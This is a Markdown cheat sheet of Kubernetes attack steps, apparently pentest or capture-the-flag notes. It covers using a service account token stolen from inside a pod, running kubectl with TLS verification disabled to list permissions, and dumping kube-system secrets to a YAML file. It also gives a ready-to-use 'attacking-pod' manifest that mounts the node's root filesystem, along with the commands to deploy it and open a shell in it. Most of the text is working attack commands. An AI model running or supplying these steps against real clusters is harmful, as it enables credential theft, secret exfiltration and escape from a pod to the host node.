59 lines
2.1 KiB
Markdown
59 lines
2.1 KiB
Markdown
# Kubernetes
|
|
|
|
* Check [kubeletctl](https://github.com/cyberark/kubeletctl.git) as well
|
|
|
|
## Account Token
|
|
* Snatch an account token from inside a pod
|
|
* Use it via kubectl, watch out for authorizations and namespaces
|
|
```sh
|
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 auth can-i --list
|
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get namespaces
|
|
```
|
|
* Save secrets from namespaces as yaml file
|
|
```sh
|
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets -o yaml -n kube-system > kube-system.yml
|
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets -n kube-system
|
|
```
|
|
* Specify secret
|
|
```sh
|
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets flag -n kube-system -o yaml
|
|
```
|
|
|
|
## Privilege Escalation
|
|
* [appsecco's blog](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)
|
|
* Show images via
|
|
```sh
|
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get pods
|
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get pod <image> -o yaml
|
|
```
|
|
* Use a found image to create the following yaml file
|
|
```yaml
|
|
apiVersion: v1
|
|
kind: Pod
|
|
metadata:
|
|
name: attacking-pod
|
|
spec:
|
|
containers:
|
|
- image: <image name in found containers section>
|
|
name: <name of image in found containers section>
|
|
command: [ "/bin/sh", "-c", "--" ]
|
|
args: [ "while true; do sleep 30; done;" ]
|
|
volumeMounts:
|
|
- mountPath: /host
|
|
name: host
|
|
volumes:
|
|
- name: host
|
|
hostPath:
|
|
path: /
|
|
type: Directory
|
|
```
|
|
* `/` of the node is mounted to `/host` inside the new pod
|
|
* Create the pod via
|
|
```sh
|
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 apply -f <filename.yaml>
|
|
```
|
|
* Run an interactive session on the pod
|
|
```sh
|
|
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 exec -it attacking-pod -- /bin/bash
|
|
```
|